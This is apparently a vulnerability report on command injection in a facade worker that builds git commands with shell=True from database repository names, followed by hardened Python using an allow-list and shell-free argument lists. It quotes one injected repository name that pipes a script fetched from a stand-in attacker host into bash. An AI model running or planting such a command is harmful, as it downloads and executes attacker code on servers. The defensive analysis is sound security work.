Our facade worker executes git commands with shell=True, building the command string from repository data read from the database. If someone adds a repository with a malicious name such as:
innocent-repo, curl attacker.com/malware.sh | bash
our server will execute both the git command and the injected command.
Location: config.py (line 285), function run_git_command(), called from repofetch.py and other facade operations.
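To make the fix concrete, here is an added example (not the facade worker's own code, and not taken from config.py or repofetch.py) that shows the difference between the shell=True string and a shell-free argv list. The repository name policy (one or two path segments of letters, digits, "_", "." and "-", no "." or ".." segments), the base URL git.example.invalid and the function names are assumptions for illustration; the vulnerable command string is only tokenised the way a POSIX shell would see it, never executed.

```python
import re
import shlex
import subprocess
from typing import List, Optional

# Assumed name policy, not Facade's own rule: "name" or "owner/name", each
# segment limited to [A-Za-z0-9_.-]. Names that fail this check are rejected
# when the row is read from the database, before any git command is built.
_SEGMENT = r"[A-Za-z0-9_.-]+"
REPO_NAME_RE = re.compile(rf"^{_SEGMENT}(/{_SEGMENT})?$")


def is_safe_repo_name(name: str) -> bool:
    """Allow-list check for repository names coming from the database."""
    if not REPO_NAME_RE.fullmatch(name):
        return False
    # "." and ".." segments would escape the clone directory; reject them too.
    return all(seg not in (".", "..") for seg in name.split("/"))


def shell_words_seen(repo_name: str,
                     base_url: str = "https://git.example.invalid") -> List[str]:
    """Tokenise the shell=True command string the way a POSIX shell would
    (shlex.split), to show how many separate words the shell would act on.
    A clean name yields 3 words; a name carrying shell syntax yields more.
    The string is only tokenised here, never executed."""
    return shlex.split(f"git clone {base_url}/{repo_name}")


def build_git_argv(repo_name: str, dest: str,
                   base_url: str = "https://git.example.invalid") -> List[str]:
    """Hardened form: validate the name, then pass it as ONE argv element.
    With no shell involved, metacharacters are just bytes inside that argument
    and cannot start a second command."""
    if not is_safe_repo_name(repo_name):
        raise ValueError(f"rejected repository name: {repo_name!r}")
    # "--" stops git from treating a name starting with "-" as an option.
    return ["git", "clone", "--", f"{base_url}/{repo_name}", dest]


def run_git_command(argv: List[str],
                    cwd: Optional[str] = None) -> subprocess.CompletedProcess:
    """Run a git argv list without a shell (subprocess.run defaults to
    shell=False). Refuses anything that is not a git invocation."""
    if argv[:1] != ["git"]:
        raise ValueError("only git invocations are allowed here")
    return subprocess.run(argv, cwd=cwd, capture_output=True, text=True)
```

The key change is that run_git_command receives a list, so the repository name never passes through a shell parser; the allow-list check is a second layer that also catches names git itself would misinterpret (leading "-", ".." segments).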